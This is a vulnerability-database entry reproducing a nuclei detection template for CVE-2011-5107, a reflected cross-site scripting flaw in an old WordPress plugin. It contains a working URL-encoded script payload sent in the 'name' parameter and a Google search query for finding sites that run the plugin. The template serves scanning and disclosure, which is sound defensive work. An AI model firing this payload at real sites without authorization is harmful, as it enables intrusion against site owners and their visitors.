Lucene search
K

Alert Before Your Post <= 0.1.1 - Cross-Site Scripting

🗓️ 15 Jun 2026 07:03:58Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 14 Views

Alert Before Your Post <= 0.1.1 - Cross-Site Scripting vulnerability in WordPres

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2011-5107
23 Aug 201220:55
attackerkb
Circl
CVE-2011-5107
21 Nov 201100:00
circl
CVE
CVE-2011-5107
23 Aug 201220:00
cve
Cvelist
CVE-2011-5107
23 Aug 201220:00
cvelist
EUVD
EUVD-2011-5007
7 Oct 202500:30
euvd
NVD
CVE-2011-5107
23 Aug 201220:55
nvd
Patchstack
WordPress Alert Before Your Post Plugin - Cross Site Scripting
21 Nov 201100:00
patchstack
Prion
Cross site scripting
23 Aug 201220:55
prion
id: CVE-2011-5107

info:
  name: Alert Before Your Post <= 0.1.1 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: A cross-site scripting  vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the Alert Before Your Post plugin (0.1.1) or remove the plugin if it is not necessary for the website's functionality.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2011-5107 https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-alert-before-your-post-cross-site-scripting-0-1-1/
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/71413
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2011-5107
    cwe-id: CWE-79
    epss-score: 0.00798
    epss-percentile: 0.74538
    cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: wordpress
    product: "alert_before_you_post"
    google-query: "inurl:\"/wp-content/plugins/alert-before-your-post\""
  tags: cve,cve2011,wordpress,xss,wp-plugin,vuln
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers:
      - type: word
        internal: true
        words:
          - '/wp-content/plugins/alert-before-your-post/'

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008d85ddb7e23e1326883cadb5db11048c895325fa30df274f04dd97a28d8243190221008490714f12d218b1ef2208e4108514fb7c2de2820d2a34207af4632545f2b65c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.00798
14